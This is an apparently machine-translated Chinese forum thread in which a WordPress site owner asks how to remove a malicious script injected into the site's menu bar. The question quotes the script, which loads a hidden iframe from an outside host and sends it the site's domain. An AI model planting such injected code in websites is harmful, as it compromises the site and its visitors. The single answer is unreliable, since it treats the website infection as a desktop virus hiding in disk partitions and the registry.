Wordpress中的惡意腳本

Question

你好，我的網站上有惡意腳本，我無法在任何地方找到它！

我在檢查檢查，它返回：

<div id="menu-bar" style="position: fixed; width: 50px; transition: all 300ms ease; height: 100%; top: 0px; right: -50px;"><div id="fechar_aba"></div> 
<div id="abrir_aba"></div> 
<div class="handle"></div> 

<script type="text/javascript"> 
    var relatedUrl = document.domain; 
    var protocol = window.location.protocol; 


    var idadv = document.createElement("iframe"); 
    with(idadv){ 
     id = "idadv"; 
     src = protocol+"//braip.com.br/wp-feed/2016/gondran/top10.php?modelo=2016&user=baixarfilme&url="+relatedUrl; 
     scrolling = "no"; 
    } 
    document.getElementById("menu-bar").appendChild(idadv); 
</script> 

<script type="text/javascript"> 
    $("#menu-bar").slideReveal({ 
     trigger: $(".handle"), 
     push: false, 
     position: "right", 
     width: 50, 
     show: function(slider, trigger){ 
     $('#menu-bar').css({"-webkit-box-shadow":"-1px 1px 3px 0px rgba(50, 50, 50, 0.3)","box-shadow":"-1px 1px 3px 0px rgba(50, 50, 50, 0.3)"}); 
     }, 
     hidden: function(slider, trigger){ 
     $('#menu-bar').css({"-webkit-box-shadow":"none","box-shadow":"none"}); 
     }, 
    }); 

</script><iframe id="idadv" src="https://braip.com.br/wp-feed/2016/gondran/top10.php?modelo=2016&amp;user=baixarfilme&amp;url=www.websiteladies.com" scrolling="no"></iframe></div> 

它坐落在我的wordpress的「菜單欄」，但我到處都找不到的東西！這樣，我的網站的SSL證書，使我的網站顯示爲我的客戶的INSECURE！我不能相信 ！

這裏是網址：http://www.websiteladies.com

任何幫助嗎？

Answer 1

我自己有這個問題，它可能需要幾個小時才能擺脫它。
它將採用JavaScript或jQuery格式或VBS格式，至少部分是。它可能在HDD或外部USB的頂端創建了自己的分區，因此請檢查分區。

它會將自己的一部分附加到註冊表中，以便它知道您何時搜索它，並且只要您在線就可以修復它自己。它可能已經開始作爲一個根文件夾，將其自身附加到文本或照片文件。

嘗試下載Spybot SD，然後脫機並安裝並運行該程序。如果病毒創建了它自己的分區，您將不得不找到它並完成對該分區的擦除，然後對其進行設置，使其成爲分區之前的分區的擴展。快速「快速清潔」不起作用，因爲它只是清理扇區標記。

我知道沒有殺毒軟件或Spybot追蹤器會隱藏分區，但它們可以清理註冊表並找到隱藏的rootkit。
嘗試記住您最近下載並安裝的內容。
檢查您插入的任何USB拇指驅動器。
我會建議保持離線狀態，直到確定病毒的所有組件都沒有了。我有一個隱藏在內部的一些組件的防病毒程序。